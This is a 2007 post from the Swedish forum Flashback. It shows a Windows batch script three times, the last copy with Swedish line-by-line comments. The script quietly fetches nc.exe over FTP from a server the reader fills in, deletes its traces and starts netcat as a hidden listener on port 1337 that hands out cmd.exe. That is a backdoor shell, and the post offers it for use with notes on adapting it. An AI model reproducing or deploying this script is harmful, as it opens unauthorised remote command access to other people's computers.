2007-04-13, 20:23

@echo off set ftpFile=%temp%\ftp.tmp echo user>%ftpFile% echo pass>>%ftpFile% echo binary>>%ftpFile% echo get nc.exe>>%ftpFile% echo.>>%ftpFile% echo quit>>%ftpFile% ftp -s:%ftpFile% 127.0.0.1 del %ftpFile% nc.exe -d -L -p 1337 -e cmd.exe
@echo off set ftpFile=%temp%\ftp.tmp echo user>%ftpFile% echo pass>>%ftpFile% echo binary>>%ftpFile% echo get nc.exe>>%ftpFile% echo.>>%ftpFile% echo quit>>%ftpFile% ftp -s:%ftpFile% 127.0.0.1 del %ftpFile% nc.exe -d -L -p 1337 -e cmd.exe
@echo off #stänger av så den inte visar fel tror jag .... set ftpFile=%temp%\ftp.tmp #här bestäms var den tillfälliga filen ftp.tmp ska ligga (oftast c:\windows\temp har jag för mig.) #där det står > betyder "skapa" och >> betyder "fyll i" filen som står efter echo user>%ftpFile% # här ändrar du till andvändarnamnet på ftpservern du vill ladda ner från. den lägger in det kommandot i filen echo pass>>%ftpFile% # samma som ovan men lösenordet. den lägger in det kommandot i filen echo binary>>%ftpFile% #här säger du att ftp ska andvända BINARY när den laddar ner filen. den lägger in det kommandot i filen echo get nc.exe>>%ftpFile% # här säger du vilken fil du ska andvända . den lägger in det kommandot i filen echo.>>%ftpFile% # syftet med . vet jag faktiskt inte men den lägger in det i filen echo quit>>%ftpFile% # här säger du till ftp att avsluta. den lägger in det kommandot i filen ftp -s:%ftpFile% 127.0.0.1 #här säger du åt windows att ftp ska följa commandona som ligger i ftp.tmp del %ftpFile% # när det är utfört tar den bort filen ftp.tmp nc.exe -d -L -p 1337 -e cmd.exe # här kör du programet du vill köra och vilka kommandon den ska köra (om programmet stöder kommandon)
Du måste vara medlem för att kunna kommentera
Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!
Swish: 123 536 99 96 Bankgiro: 211-4106